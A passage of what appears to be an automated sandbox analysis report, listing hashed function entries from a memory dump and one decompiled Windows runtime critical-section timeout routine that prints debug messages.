                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0c619307482d12233441a361515896e251e38ddb9e858f67789e067b13711968
                                                                              • Instruction ID: fe90b30f34ad79feb15b8edb9d3f42ebbd2cdf70e9ab5e570a7e4cec85ae1b67
                                                                              • Opcode Fuzzy Hash: 0c619307482d12233441a361515896e251e38ddb9e858f67789e067b13711968
                                                                              • Instruction Fuzzy Hash: 28900271A09000179190719988547868006F7E4785B55C031A0504554CCA949A5573E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 94e5ac17d7b899e682f7112ee68202e433b2c15052caceb069d9f6c0dcfbb425
                                                                              • Instruction ID: e2d6e3ba4b0e52bc7d536164c8930cda6b3f2722cfb3bc642bd84c35f2746c57
                                                                              • Opcode Fuzzy Hash: 94e5ac17d7b899e682f7112ee68202e433b2c15052caceb069d9f6c0dcfbb425
                                                                              • Instruction Fuzzy Hash: BD9002E1205140974550A299C444B4A8505E7E4245B51C036E1044560CC6659851B175
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A95F0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1f689e4b1a9ef2a314886306251f108e6caca189061924f0c06dda616a30f584
                                                                              • Instruction ID: 66aac58905a90a117dd052c1dc468bfb753f94bf712b45189f526bed4bc8236a
                                                                              • Opcode Fuzzy Hash: 1f689e4b1a9ef2a314886306251f108e6caca189061924f0c06dda616a30f584
                                                                              • Instruction Fuzzy Hash: 1290027120500807D154619988447C64005E7D4345F51C031A6014655ED7A598917171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9770 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b2dc61042991e149882d7c2e04b157c6885f27051c18d917126ecf4286a49033
                                                                              • Instruction ID: 71decf09e761d45c26f3ec41d4236cec3f0a1fca090b08fa66deeb8261d672e9
                                                                              • Opcode Fuzzy Hash: b2dc61042991e149882d7c2e04b157c6885f27051c18d917126ecf4286a49033
                                                                              • Instruction Fuzzy Hash: A490026120904447D15065999448B464005E7D4249F51D031A1054595DC7759851B171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017AA770 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bbcad94e4259ccf72facf10832594029fb0d5fa525045651781de619c89589e6
                                                                              • Instruction ID: 9534e77c2a11ceefcd66f22ea70b7f5b4575196c502f2681c444eb030ab3f6fb
                                                                              • Opcode Fuzzy Hash: bbcad94e4259ccf72facf10832594029fb0d5fa525045651781de619c89589e6
                                                                              • Instruction Fuzzy Hash: 7C90027520904447D55065999844BC74005E7D4349F51D431A041459CDC7949861B161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9760 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6eaf3421e95c96afb537547a83639eb2e6d109bf6e4656c0d96a1e7768dc191e
                                                                              • Instruction ID: 2a42d03742761fa267eceee48b2a888fe21290d98039c9ce4d11d84c4fa3e71e
                                                                              • Opcode Fuzzy Hash: 6eaf3421e95c96afb537547a83639eb2e6d109bf6e4656c0d96a1e7768dc191e
                                                                              • Instruction Fuzzy Hash: 1B90047130500407D15071DDD54C7474005F7D4345F51D431F041455CDD7D7DC517171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9730 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57aa98e8f96d96c37d172761780cd03cad3be03964b46568c38c26fbf7c744a2
                                                                              • Instruction ID: c0dad7bec96a229cea53975bc2691527f3ab278c26f7148c78e3c3c033f68475
                                                                              • Opcode Fuzzy Hash: 57aa98e8f96d96c37d172761780cd03cad3be03964b46568c38c26fbf7c744a2
                                                                              • Instruction Fuzzy Hash: C590026160900407D190719994587464015E7D4245F51D031A0014554DC7999A5576E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017AA710 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3af49f84a90a632cf97087a310e68bb5ea4ded4f4d4f252c130fe35970c033a6
                                                                              • Instruction ID: 22e57345e7a2a4bcef814306bc98f826f8312d30390c914bd7d654c8c51f3ed7
                                                                              • Opcode Fuzzy Hash: 3af49f84a90a632cf97087a310e68bb5ea4ded4f4d4f252c130fe35970c033a6
                                                                              • Instruction Fuzzy Hash: D5900271305000579550A6D99844B8A8105E7F4345B51D035A4004554CC69498617161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9650 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 31bda2295732aff14622bb064df9a05f1c4d39111a60b2b3c639c995686d828d
                                                                              • Instruction ID: 33999f057ebe43d2d15ca5d0c7abda00d678dd67c51d389ccefcf8ea2899e990
                                                                              • Opcode Fuzzy Hash: 31bda2295732aff14622bb064df9a05f1c4d39111a60b2b3c639c995686d828d
                                                                              • Instruction Fuzzy Hash: E790027120904847D19071998444B864015E7D4349F51C031A0054694DD7659D55B6A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9610 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 12bf9d35277299aad0105b0809cc7bb6919058a0e6699094e9b6bee55d265427
                                                                              • Instruction ID: 46f8e0b85715b14946910e0d43b5ce03eea03739a7d4a82f2eb5b0c711d62288
                                                                              • Opcode Fuzzy Hash: 12bf9d35277299aad0105b0809cc7bb6919058a0e6699094e9b6bee55d265427
                                                                              • Instruction Fuzzy Hash: C490027160900807D1A0719984547864005E7D4345F51C031A0014654DC7959A5576E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A96D0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 40312308fff5a945112d144e517c4ff9af80425f313f16a1a415ce0d06917359
                                                                              • Instruction ID: b6ac6b131a1d0ea2946c5e45a06a8845ff92b9f353f3d2a0b15966ea4287658d
                                                                              • Opcode Fuzzy Hash: 40312308fff5a945112d144e517c4ff9af80425f313f16a1a415ce0d06917359
                                                                              • Instruction Fuzzy Hash: DA90027120500847D15061998444B864005E7E4345F51C036A0114654DC755D8517561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction ID: a73b869ec6beeb01ae0695fc607a0c59ebfc75ad46777d0ba6c957a89f914a70
                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction Fuzzy Hash:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017FFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E017FFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E017ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E017F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E017F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                              0x017ffdda
                                                                              0x017ffde2
                                                                              0x017ffde5
                                                                              0x017ffdec
                                                                              0x017ffdfa
                                                                              0x017ffdff
                                                                              0x017ffe0a
                                                                              0x017ffe0f
                                                                              0x017ffe17
                                                                              0x017ffe1e
                                                                              0x017ffe19
                                                                              0x017ffe19
                                                                              0x017ffe19
                                                                              0x017ffe20
                                                                              0x017ffe21
                                                                              0x017ffe22
                                                                              0x017ffe25
                                                                              0x017ffe40

                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017FFDFA
                                                                              Strings
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017FFE2B
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017FFE01
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                              • API String ID: 885266447-3903918235
                                                                              • Opcode ID: 7fd9bd7a62bc838d41190bb8b4fddf0ba018e8612cc5d0d4c32e57ec33844e85
                                                                              • Instruction ID: e2a0f2a4d97c8fc8fdef7844a76bbb60c49365318a6e4cefd9712b8535eedf72
                                                                              • Opcode Fuzzy Hash: 7fd9bd7a62bc838d41190bb8b4fddf0ba018e8612cc5d0d4c32e57ec33844e85
                                                                              • Instruction Fuzzy Hash: 21F0F673640602BFE7201A45DC06F23FF5AEB44B30F140318F728562E1EAA2F82086F0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%